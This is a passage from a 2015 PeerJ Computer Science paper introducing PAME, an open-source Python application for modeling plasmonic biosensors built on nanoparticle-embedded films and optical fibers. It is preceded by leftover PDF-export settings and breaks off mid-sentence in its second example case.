desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_k2rbb6kaibeglln3pargxs36wy ---- PAME: plasmonic assay modeling environment Submitted 16 May 2015 Accepted 24 July 2015 Published 26 August 2015 Corresponding author Adam Hughes, hugadams@gwmail.gwu.edu Academic editor Feng Gu Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.17 Copyright 2015 Hughes et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS PAME: plasmonic assay modeling environment Adam Hughes, Zhaowen Liu and Mark E. Reeves The George Washington University, Washington, D.C., USA ABSTRACT Plasmonic assays are an important class of optical sensors that measure biomolecular interactions in real-time without the need for labeling agents, making them especially well-suited for clinical applications. Through the incorporation of nanoparticles and fiberoptics, these sensing systems have been successfully miniaturized and show great promise for in-situ probing and implantable devices, yet it remains challenging to derive meaningful, quantitative information from plasmonic responses. This is in part due to a lack of dedicated modeling tools, and therefore we introduce PAME, an open-source Python application for modeling plasmonic systems of bulk and nanoparticle-embedded metallic films. PAME combines aspects of thin-film solvers, nanomaterials and fiber-optics into an intuitive graphical interface. Some of PAME’s features include a simulation mode, a database of hundreds of materials, and an object-oriented framework for designing complex nanomaterials, such as a gold nanoparticles encased in a protein shell. An overview of PAME’s theory and design is presented, followed by example simulations of a fiberoptic refractometer, as well as protein binding to a multiplexed sensor composed of a mixed layer of gold and silver colloids. These results provide new insights into observed responses in reflectance biosensors. Subjects Computational Biology, Scientific Computing and Simulation, Software Engineering Keywords Assays, Bioengineering, Python, Modeling, Biosensing, Simulation, Software, Plasmonics, Nanoparticles, Fiberoptics, Thin films INTRODUCTION Plasmonic sensors refer to a class of label-free detection platforms that utilize the optical properties of metals as a transduction mechanism to measure physical, chemical and biomolecular processes. These sensors have been utilized in immunology research (Pei et al., 2010; Tang, Dong & Ren, 2010), drug discovery (Chen, Obinata & Izumi, 2010; Kraziński, Radecki & Radecka, 2011), DNA mutations (Litos et al., 2009), and in many other novel applications. The conventional configuration of a plasmonic sensor is a thin layer of metal, most commonly gold or silver, deposited on a glass chip and illuminated from below at oblique incidence. This induces plasmon excitations along the surface of the film. This design has been successfully commercialized by BiacoreTM, and has been extended to include multilayer and mixed-alloy films (Sharma & Gupta, 2006; Sharma & Gupta, 2007), and films deposited on optical fibers. Over the same time period, gold and silver nanoparticles (AuNPs, AgNPs) gained attention for their potential in drug delivery (Jong, 2008; Wilczewska et al., 2012), and their intrinsic sensing properties, as How to cite this article Hughes et al. (2015), PAME: plasmonic assay modeling environment. PeerJ Comput. Sci. 1:e17; DOI 10.7717/peerj-cs.17 mailto:hugadams@gwmail.gwu.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.17 http://dx.doi.org/10.7717/peerj-cs.17 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.17 each individual nanoparticle acts as a nanoscale transducer. Surface plasmons localized to roughly a 50 nm region around the colloid (Malinsky et al., 2001) are excited by light of any angle of incidence, and exhibit strong electromagnetic hotspots (Barrow et al., 2012; Cheng et al., 2011) with greater sensitivity to their local environment than bulk films. This is especially true for non-spherical nanoparticles like nanorods and nanostars (Yin et al., 2006; Nikoobakht & El-sayed, 2003; Kessentini & Barchiesi, 2012), and leads to great field-enhancements for Raman spectroscopy (Freeman et al., 1995; Sau et al., 2010). While free solutions of colloids alone can serve as sensors (Jans et al., 2009; Tang, Dong & Ren, 2010), they are easily destabilized by surface agents, and alterations in salinity and pH of their surrounding environment, resulting in particle aggregation (Pease et al., 2010; Zakaria et al., 2013). Nanoparticle monolayers engineered through vapor deposition (Singh & Whitten, 2008), lithography (Haes et al., 2005), or self-assembly onto organosilane linkers (Nath & Chilkoti, 2002; Brown & Doorn, 2008; Fujiwara, Kasaya & Ogawa, 2009) now commonly replace their bulk film counterparts, since they retain the enhanced sensitivity and flexible surface chemistry of the colloids, while being less prone1 1 Chemically-deposited nanoparticles are slightly mobile in the film, and still tend to form dimers, trimers and higher order clusters under certain conditions (Scarpettini & Bragas, 2010; Hughes et al., 2015). to aggregation. Label-free measurements are indirect and prone to false-positives, as it can be difficult to distinguish specific binding events from non-specific binding, adsorption onto the sensor surface, and changes in the environment due to heating, convection and other processes. To mitigate these effects, plasmonic sensors undergo an extensive standardization process. First, they are calibrated to yield a linear response to bulk refractive index changes. Next, the sensor surface is modified2 to be neutral, hydrophillic and sparsely covered with 2 For planar gold chips, Dextran provides an optimal coating; however, for nanoparticles, short-chain alkanethiols and polyethylene glycols are preferred due to their smaller size (Malinsky et al., 2001; Mayer et al., 2008). covalently deposited ligands. To measure ligand-analyte association and dissociation constants, ka,kd, solutions of varying concentration of analyte are washed over the surface, and the response is measured and interpreted within a protein interaction model (Pollard, 2010; Chang et al., 2013). Each of these steps impose challenges for plasmonic sensors utilizing nanoparticle-embedded films. Primarily, the sensor response becomes highly sensitive to the film topology (Quinten, 2011; Lans, 2013), which is difficult to interpret and optimize without modeling tools. Furthermore, measurements of ka and kd require varying analyte concentrations under identical surface conditions. Commercial systems often employ multichannel-sampling on a single surface (Attana, 2014), or multiplex multiple surfaces in a single run (ForteBio, 2013), while researchers mostly rely on the presumption of identical sensor surface topology, chemistry and experimental conditions. Without a quantitative model for sensor response to protein binding, it is impossible to estimate how many molecules are adsorbed on the sensor. This information is critical to validating binding models; for example, whether a measured response is too large to be described by a 1:1 monomeric reaction. Is the amount of deposited ligand likely to lead to avidity effects? In non-equilibrium applications such as monitoring the hormone levels of cells, the analyte concentration is unknown and only a single excretion event may occur; in such cases, the ability to translate optical responses directly into quantitative estimations of ligand and receptor through modeling is paramount. Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 2/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.17 Researchers modeling plasmonic systems may opt to use monolithic design tools like COMSOLTM Multiphysics and LumericalTM Solutions. While such tools offer comprehensive photonic design environments, they are quite general in design and carry more overhead than is needed to model the basic fiber and chip geometries described in this paper. On the other hand, related open-source tools are too disjoint to be effectively integrated into a single workflow. For example, thin-film solvers are widely available (for a comprehensive list, see Optenso, 2014), and the MNPBEM Toolbox (Hohenester & Trugler, 2012) offers a MatlabTM interface for nanomaterial design. Yet, to design materials in MNPBEM and integrate them into film solvers requires a customized pipeline. Furthermore, simple geometric fill models for nanoparticle-protein binding are not available in these tools, even though these fill models have been successful (Klebstov, 2004; Lopatynskyi et al., 2011; Tsai et al., 2011) in describing AuNP-protein binding in free solution. With an abundance of parameters, ranging from the nanoscale to the macroscopic, characterizing a biosensor can quickly become intractable and a specialized solution is needed. Herein, the Plasmonic Assay Modeling Environment (PAME) is introduced as an open-source Python application for modeling plasmonic biosensors. PAME is a fully graphical application that integrates aspects of material science (material modeling, effective medium theories, nanomaterials), thin-film design, fiberoptics, ellipsometry and spectroscopy, with the goal of providing a simple framework for designing, simulating and characterizing plasmonic biosensors. PAME helps to illuminate non-obvious relationships between sensor parameters and response. After an overview of its theory and design, several examples are presented. First, PAME is used to model the refractometric response of an AuNP-coated optical fiber to increasing concentrations of glycerin. It is shown that the response peaks at λmax ≈ 485 nm , a result supported by experiment, even though the nanoparticles absorb most strongly at λmax ≈ 528 nm. Next, PAME simulates protein binding events onto a mixed layer of gold and silver nanoparticles in a multiplexed fiber setup. Finally, a brief overview of PAME’s requirements, performance and future development is presented. Additional examples in the form of IPython notebooks (Perez & Granger, 2007), as well as video tutorials, are available in the Supplemental Information. THEORY AND DESIGN Many plasmonic sensors can be modeled as a multilayer stack of homogeneous materials, also referred to as films or dielectric slabs, arranged on a substrate so as to transduce interactions between light and the stack. The substrate represents a light guide such as a chip or an optical fiber. The transduced signal is some optical property of the multilayer, commonly transmittance or spectral reflectance, or in the case of ellipsometry, changes in the reflected light’s polarization state (Moirangthem, Chang & Wei, 2011). Much of the diversity in plasmonic sensors is therefore due to design parameters rather than dissimilar physics, and has been described thoroughly by BD Gupta (Sharma & Gupta, 2006; Sharma & Gupta, 2007; Gupta & Verma, 2009; Singh, Verma & Gupta, 2010; Mishra, Mishra & Gupta, 2015). PAME was designed specifically to model these types of systems. Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 3/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.17 Figure 1 PAME’s user interface. (A) Panel to view material quantities such as index of refraction, n(λ), and nanoparticle extinction cross section, σext(λ). Currently shown is e(λ) for a layer of gold nanoparticles in water at a fill fraction of about 30% using Garcia’s mixing model. (B) Panel of plotted optical properties such as transmittance, T(λ), and reflectance, Γ(λ). Here the reflectance coefficient for P-polarized light rP(λ) is shown. The spread in the linewidth corresponds to variations in light modes over the range 0 > θ ≥ 16◦. (C) Five primary panels and tabular interface (D) for constructing the dielectric stack: silica (substrate) | organosilanes (2 nm) | AuNPs in H2O (24 nm) |H2O (solvent) for 300 ≤ λ ≤ 800 nm. PAME is designed with four integrated subprograms: a materials adapter to model bulk, composite, and nanomaterials; a multilayer thinfilm calculator; a substrate design interface; and a simulation and data analysis framework. Figure 1 shows a screenshot of the PAME’s main window, with its five primary panels: Main, Substrate, Stack, Material and Simulations. Main refers to global settings, for example the operating wavelength range. The remaining tabs correspond directly to the four aforementioned subprograms. Together, they provide a complete framework for modeling a plasmonic sensor, and lend a useful narrative that will be followed in the ordering of the remaining sections of this paper. Incidentally, the progression from Substrate, Stack and Material represents a top-down view of the model, starting from macroscopic parameters and working down to the microscopic. Substrate types PAME supports two substrates: optical fibers and chips. Substrates mediate the interaction between light and the multilayer stack through a weighting function, N i f (θi), where θi corresponds to the angle of the ith incident light ray onto the substrate. The chip is meant to describe simple configurations, for example a gold film deposited on a glass slide and illuminated from below at a single angle, θo. In this case, N i f (θi) = δ(θo). For optical fibers, the propagation modes are determined by properties of the fiber itself, such as its numerical aperture, core and cladding materials, and its ability to maintain polarization states. Furthermore, the placement of the multilayer on different regions of the fiber has a Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 4/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.17 Figure 2 Light propagation in fiber optic biosensor. (A) A light ray propagating in an optical fiber core. Transverse refers to a multilayer deposited along the propagation direction, while axial is perpendicular and deposited on the fiber endface. The fiber cladding and jacket are hidden for clarity. (B) The θ = 0 plane wave incident on the stack. (C) Illustration of the homogenized multilayers, and some of the electromagnetic quantities associated with each interface, reproduced with permission from (Orfanidis, 2008). significant effect on f (θi), and hence on the optical response of the sensor. The two most common orientations, either transversally3 along the propagation direction on the fiber, 3 See Mishra, Mishra & Gupta (2015) Eq. (5) for an example of f (θ ) for a transversal fiber with collimated light source. or axially on the cleaved fiber endface, are shown in Fig. 2. Both of these orientations have been realized as biosensors (Lipoprotein et al., 2012; Shrivastav, Mishra & Gupta, 2015), with the axial configuration, often referred to as a “dip sensor” because the endface is dipped into the sample, appearing more often in recent years (Mitsui, Handa & Kajikawa, 2004; Wan et al., 2010; Jeong et al., 2012; Sciacca & Monro, 2014). PAME does not presently support multilayers along bent regions of the fiber, or along sharpened optical tips (Issa & Guckenberger, 2006; Library et al., 2013) and assumes all rays to be plane waves. For advanced waveguide design and modal analysis, we recommend LumericalTM MODE solutions. PAME’s Substrate interface queries users to configure chip and optical fiber parameters, rather than working directly with f (θi). Users can choose between multilayer orientation, polarization state (P, S or unpolarized), and range of angles, all from which PAME builds f (θ ). The interface is user-friendly, and attempts to obviate incompatible or unphysical settings. For instance, the ellipsometric amplitude (Ψ) and phase (δ) depend on ratios of P-polarized to S-polarized light reflectance, but users may opt to only compute S-waves, resulting in errant calculations downstream. Anticipating this, PAME provides an ellipsometry mode, which when enabled, prevents the polarization state from being changed. By combining substrate types with context modes, PAME provides a simple interface for modeling a number of common optical setups. Multilayer stack Figure 2 depicts the multilayer stack, in which each dielectric slab is assumed to be homogenous, and of uniform thickness; heterogeneous materials must be homogenized through an effective medium theory (EMT). Furthermore, the multilayer model presumes that layers are connected by smooth and abrupt boundaries to satisfy Fresnel’s equations. The first and last layers, conventionally referred to as “substrate” and “solvent,” are assumed to be semi-infinite, with incident light originating in the substrate. The treatment Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 5/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.17 of anisotropic layers without effective medium approximations is discussed in the Future Improvement section. A light ray incident on the stack at angle θ , as set by f (θ ), will reflect, refract and absorb, in accordance with Fresnel’s equations. For example, in a simple 2-layer system, the light reflectance, Γ(λ), at the boundary between n1,n2 is R = 1 2 (rs + rp) (1) R = 1 2 n1 cosθi − n2 cosθtn1 cosθi + n2 cosθt 2 + n1 cosθt − n2 cosθin1 cosθt + n2 cosθi 2  , (2) where θi,θt are the angles of incidence upon, and transmission into n2 from n1, and rs and rp are the complex reflection coefficients of the S and P-polarized light. For N -layers, Fresnel’s equations are solved recursively using the transfer matrix method(TMM), also referred to as the recursive Rouard method (Rouard, 1937; Lecaruyer et al., 2006). In addition to the reflectance, transmittance and absorbance, a variety of optical quantities are computed in the multilayer, including the Poynting vector, the complex wave vector angle, ellipsometric parameters, and film color. For a thorough treatment of light propagation in multilayer structures, see Orfanidis (2008) and Steed (2013). PAME offers a simple tabular interface for adding, removing, and editing materials in arbitrarily many layers, as shown in Fig. 2C. PAME delegates the actual TMM calculation to an adapted version of the Python package, tmm (Byrnes, 2012). PAME material classes PAME includes three material categories: bulk materials, composite materials and nanomaterials. A bulk material such as a gold film is sufficiently characterized by its index of refraction. The optical properties of a gold nanoparticle, however, depend on the index of gold, particle size, the surrounding medium, a particle-medium mixing model, and other parameters. A nanoparticle with a shell is even more intricate. PAME encapsulates a rich hierarchy of materials in an object-oriented framework to ensure compatibility with the multilayer stack and interactive plotting interface. Bulk material In PAME, a “bulk” material refers to a single, homogeneous substance, fully characterized by its complex index of refraction, ñ = n + iκ, or dielectric function, ẽ = e + iϵ, which are related through a complex root (ẽ = √ ñ), which gives the relations e = n2 − κ 2 n =  √ e2 + ϵ2 + e 2 ϵ = 2nκ κ =  √ e2 + ϵ2 − e 2 . Here n and e, and optical quantities derived from them, are understood to be dispersive functions of wavelengths, n(λ),e(λ). The refractive index n is assumed to be independent Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 6/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.17 of temperature and non-magnetic at optical frequencies4. The index of refraction of 4 Ferromagnetic nanoparticles do exist, and are have already been utilized in sensing applications (Pellegrini & Mattei, 2014). bulk materials is obtained through experimental measurements, modeling, or through a combination of the two; for example, measuring n at several wavelengths, and fitting to a dispersion model such as the Sellmeier equation, n(λ) =  1 + A1λ2 λ2 − B21 + A2λ2 λ2 − B22 + A3λ2 λ2 − B23 + ···. (3) PAME is bundled with several dispersion models, including the Cauchy, Drude and Sellmeier relations, as well as two freely-available5 refractive index catalogs: Sopra (2008) 5 Materials are supplied as is with no guarantee of accuracy: use at your own discretion. and RefractiveIndex.INFO (Polyanskiy, 2015), comprising over 1,600 refractive index files. PAME includes a materials adapter to browse and upload materials as shown in Fig. 3. Selected materials are automatically converted, interpolated, and expressed in the working spectral unit (nm, eV, cm, . . . ) and range. PAME’s plots respond to changes in material parameters in real time. Composite materials A composite consists of two materials bound by a mixing function. For example, a gold-silver alloy could be modeled as bulk gold and silver, mixed through an effective mixing theory (EMT). The complexity of the EMT is related to the electromagnetic interactions between the materials. For example, for binary liquid mixtures with refractive indicies, n1,n2, and fill fraction, φ, the composite can be approximated as nmixed = n1φ + n2(1 − φ), with more complex liquid mixing models like Weiner’s relation and Heller’s relation yielding negligible differences (Bhatia, Tripathi & Dubey, 2002). For solid inclusions, the extension of the Maxwell–Garnett (MG) mixing rule (Garnett, 1904) by Garcıa, Llopis & Paje (1999) has been shown effective, even when the particles are non-spherical and anisotropically clustered (Li et al., 2006). At present, PAME includes MG, with and without Garcia’s extension, the Bruggeman equation (Bruggeman, 1935), the quasi-crystalline approximation with coherent potential (Liu et al., 2011; Tsang, Kong & Shin, 1985), and various binary liquid mixing rules. These are hardly exhaustive, and new methods are continually appearing (Amendola & Meneghetti, 2009; Battie et al., 2014; Malasi, Kalyanaraman & Garcia, 2014). Adding EMTs to PAME is straightforward, and more will be added in upcoming releases. Composite materials are not limited to bulk materials, but include combinations of composites and/or nanomaterials, for example gold and silver nanoparticles embedded in a glass matrix. However one must be aware of the limitations of implicit mixing models. For example, consider a layer of gold nanoparticles. As coverage increases, particle–particle interactions are taken into account in Garcia’s EMT through the parameter K. EMTs describing inclusions of two or more material types have been described (Zhdanov, 2008; Bossa et al., 2014), and will be available in future versions. PAME’s geometric fill models are also implemented as composite material classes. For example, small spheres of material X binding to the surface of a larger sphere of material Y serves as a useful model for proteins binding to gold nanoparticles (Lopatynskyi et al., 2011). An ensemble of spherical Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 7/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.17 Figure 3 Screenshot of PAME’s material adapter. (A) Tree view of available bulk material models, files and bundled catalogues. (B) Preview of the selected material includes available material metadata, notes and an interpolated fit to the current spectral range and unit system. Currently showing ẽ for gold from Johnson & Christy (1972). (C) Search utility to find and batch upload materials. inclusions on a disk is the correct geometry for modeling gold nanoparticles adhered to the cleaved end of a fiber surface. PAME’s fill models track the number of inclusions, fill fraction, and other quantitative parameters at any given time. This enables macroscopic quantities like sensor sensitivity to be measured against microscopic parameters like the number of proteins bound to the nanoparticles. Nanomaterials In PAME, nanomaterials are treated as a special instance of a composite material6 whose 6 A layer of nanoparticles is always embedded in some other media, for example in a slab of water or a sol–gel matrix of glass. Therefore, in an object- oriented framework, a nanomaterial is a subclass of a composite material, with additional attributes like particle size and implicit optical properties. properties depend on a core material, a medium material, possibly an intermediate shell material, and particle size. A key distinction between nanomaterials and their bulk counterparts is that the optical properties of nanoparticles are highly sensitive to both the particle size and the permitivity of the surrounding medium. The implicit optical properties of spheroidal nanoparticles, such a extinction cross section, σext, are solved analytically through Mie Theory (Bohren, 1983; Jain et al., 2006). This is a fundamentally important quantity, as the position and shift in the extinction cross section maximum, Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 8/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.17 Figure 4 Theoretical optical absorption and scattering properties of gold and silver nanoparticles. Ex- tinction, absorption and scattering cross sections of (A) 60 nm silver and (B) 80 nm gold nanoparticles computed in PAME using reported permittivities from Hagemann, Gudat & Kunz (1975) and Gao, Lemarchand & Lequime (2011), respectively, which produced more accurate cross sections than the typically-used Drude model. known as the localized plasmon resonance (Willets & Van Duyne, 2007; Anker et al., 2008), is often the best indicator of the state of the nanoparticles comprising the system. While the full solution to the extinction cross section is described by the sum of an infinite series of Ricatti–Bessel functions, described in full in Lopatynskyi et al. (2011), for brevity consider the approximate expression (Jeong et al., 2012; Van de Hulst, 1981): σext ≈ 128π 5 3λ4 R6Im  m2 − 1 m2 + 2 2    ≈σscatt − 8π 2 λ R3  m2 − 1 m2 + 2     ≈σabs , (4) where m is the ratio of the refractive index of the core particle material to that of the suspension medium (e.g., gold to water). The polynomial dependence of R, λ and m demonstrate the high variability in the optical properties of nanoparticles, and by extension, the biosensors that utilize them. Typical cross sections from silver and gold nanospheres are depicted in Fig. 4. While optical constants derived from Mie Theory are computed analytically, it is important to recognize that in a dielectric slab, nanomaterials are represented by an effective dielectric function; thus, optical constants like transmittance or reflectance will be computed using an effective dielectric function representing the nanoparticle layer. PAME currently supports nanospheres and nanospheres with shells; planned support for exotic particle morphologies is described in the Future Improvements section. Similar treatments of nanoparticle layers with effective media approximations have been successful (Li et al., 2006; Liu et al., 2011), even for non-spherical particles, and for ensembles of different sized particles (Battie et al., 2014). This is a salient difference between PAME, and numerical approaches like the boundary element method(BEM), discrete dipole approximation(DDA) and finite-difference time-domain(FDTD): PAME relies on mixing theories, and hence is constrained by any underlying assumptions of the mixing model. For Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 9/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.17 Figure 5 PAME’s simulation interface, showing the Selection, Notes/IO and Storage tabs. a more in-depth discussion on nanoparticle modeling, see Myroshnychenko et al. (2008) and Trügler (2011). Simulation and data analysis PAME’s interactivity makes it ideal for exploring the relationships between system variables, while the simulation environment provides the means to systematically increment a parameter and record the correspond response; for example, incrementing the fill fraction of inclusions in a nanoparticle shell to simulate protein binding, or incrementing the refractive index of the solvent to simulate a refractometer. Because most updates in PAME are automatically triggered, simulations amount to incrementing parameters in a loop and storing and plotting the results. PAME’s simulation interface simplifies the process of setting simulation variables and storing results. It is comprised of three tabs: a Selection tab (Fig. 5) for setting simulation parameters and value ranges. Variable names like layer1.d refers to the thickness of the first layer in the multilayer stack, and material2.shell thickness is the size of the nanoparticle shell in nanometers of material2. PAME provides suggestions, documentation and a tree viewer to choose simulation variables, and alerts users to errant inputs, or invalid ranges; for example, if users try to simulate a volume fraction beyond its valid range of 0.0 to 1.0. The Notes/IO tab provides a place to record notes on the simulation, and configure the output directory. PAME can store all of its state variables in every cycle of the simulation, including the entire multilayer structure, and all computed optical quantities, but this can lead to storing large quantities of redundant data. The Storage tab lets users pick and choose their storage preference, and even specify the quantities that should be regarded as “primary” for easy access when parsing. PAME provides a SimParser object to interact with saved simulations, which while not required, is intended to be used inside an IPython Notebook (Perez & Granger, 2007) environment. The SimParser stores primary results in Pandas (McKinney & Millman, 2010) and scikit-spectra (Hughes & Liu, 2014) objects for easy interaction and visualization, and the remaining results are stored in JSON. This allows for immediate analysis of the most important simulation results, with the remaining data easily accessed later through a tree viewer and other SimParser utilities. Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 10/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.17 EXAMPLES OF USE Case 1: refractometer Plasmonic sensors respond to changes in their surrounding dielectric environments, and are commonly utilized as refractometers (Mitsui, Handa & Kajikawa, 2004; Punjabi & Mukherji, 2014), even going so far as to measure the refractive index of a single fibroblast cell (Lee et al., 2008). Refractive index measurements can also be used to measure sensitivity and linear operating ranges. A common approach is to immerse the sensor in a medium such as water, and incrementally change the index of refraction of the medium by mixing in glycerine or sucrose. Because the index of refraction as a function of glycerine concentration is well-known (Glycerine Producers’ Association , 1963), sensor response can be expressed in refractive index units (RIU). This is usually taken a step further in biosensor designs, where the RIUs are calibrated to underlying biophysical processes (e.g., protein absorption), either through modeling as PAME does, or through orthogonal experimental techniques such as Fourier Transform Infrared Spectroscopy (Tsai et al., 2011). This calibration process has been described previously (Jeong & Lee, 2011; Richard & Anna, 2008), and is usually carried through in commercial plasmonic sensors. This quantifies the analyte binding capacity of the sensor, an important parameter for assessing binding models7, non-equilibrium sensing, and performing one-step measurements, for 7 Schasfoort et al. (2012) has enumerated seven interfering effects that lead to errant calculations of equilibrium affinity constants. Estimations of nanoparticle and ligand density at the sensor surface provide insights as to whether or not some of these effects are likely occurring. example estimating the glucose levels in a blood sample. As a first use case, PAME is used to calibrate sensor response to increasing concentrations of glycerine for an axial fiber comprised of a 24 nm layer of gold nanoparticles. A dip sensor was constructed using a protocol and optical setup similar to that of Mitsui, Handa & Kajikawa (2004). In brief, optical fiber probes were cleaved, submerged in boiling piranha (3:1 H2SO4 : H2O2), functionalized with 0.001% (3-Aminopropyl) trimethoxysilane for 60 min in anhydrous ethanol under sonication, dryed in an oven at 120 ◦C, and coated with 24 nm AuNPs to a coverage of about 40 ± 5%, as verified by SEM imaging (Hughes et al., 2015). The fiber was submerged in 2 mL of distilled water under constant stirring, and glycerine droplets were added incrementally until the final glycerine concentration was 32%, with each drop resulting in a stepwise increase in the reflectance as shown in Figs. 6A and 6C). This system was simulated using the stack described in Fig. 1, where the organosilanes were modeled as a 2 nm-thick layer of a Sellmeier material (Eq. (4)), with coefficients: A1 = 6.9,A2 = 3.2,A3 = 0.89,B1 = 1.6,B2 = 0.0,B3 = 50.0. These coefficients led to excellent agreement between experiment and simulation during the self-assembly process of the AuNP film. Figures 6C and 6D shows the strong agreement between measured and simulated response to increasing glycerine, and PAME is able to show the reflectance spectrum free of the influence of the LED light source in the dataset(b,a). It is clear that while the nanoparticle’s reflectance is prominent around λmax ≈ 560 nm, the combination of both an increase in reflectance, and a blue-shift of spectral weight yield a 485 nm peak in the normalized reflectance spectrum. Neither is indicative of the free-solution plasmon resonance peak at λmax ≈ 528 nm , and maintaining a correspondence between the reflectance centroid and plasmon resonance can lead to misinterpretation. Furthermore, Hughes et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.17 11/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.17 Figure 6 Simulated and measured spectral reflectance from a fiberoptic biosensor. Increase in spectral reflectance (Γ) from a fiber dip sensor at 40% AuNP coverage immersed in water glycerine mixture as glycerine fraction is increased from 0 to 32% for the experiment (A) and simulation (B). The same response, normalized to the reflectance of the probe in water (Γo) prior to the addition of glycerine (C, D). The AuNPs layer reflects most strongly at λmax ≈ 560 nm, yet the normalized reflectance peaks at λmax ≈ 485 nm. the shape of this glycerine response profile is very sensitive to parameters like organosilane layer thickness and nanoparticle size and coverage, and by fitting to the simulated response, one may then estimate these parameters which are otherwise difficult to measure. This simple example provides valuable insights into the relationship between glycerine concentration and reflectance on a dip sensor. Case 2: multiplexed Ag–Au sensor Sciacca & Monro (2014) recently published a multiplexed biosensor in which both gold and silver nanoparticles were deposited on the endface of a dip sensor and their reflectance was monitored simultaneously. In their experiment, the gold colloids were 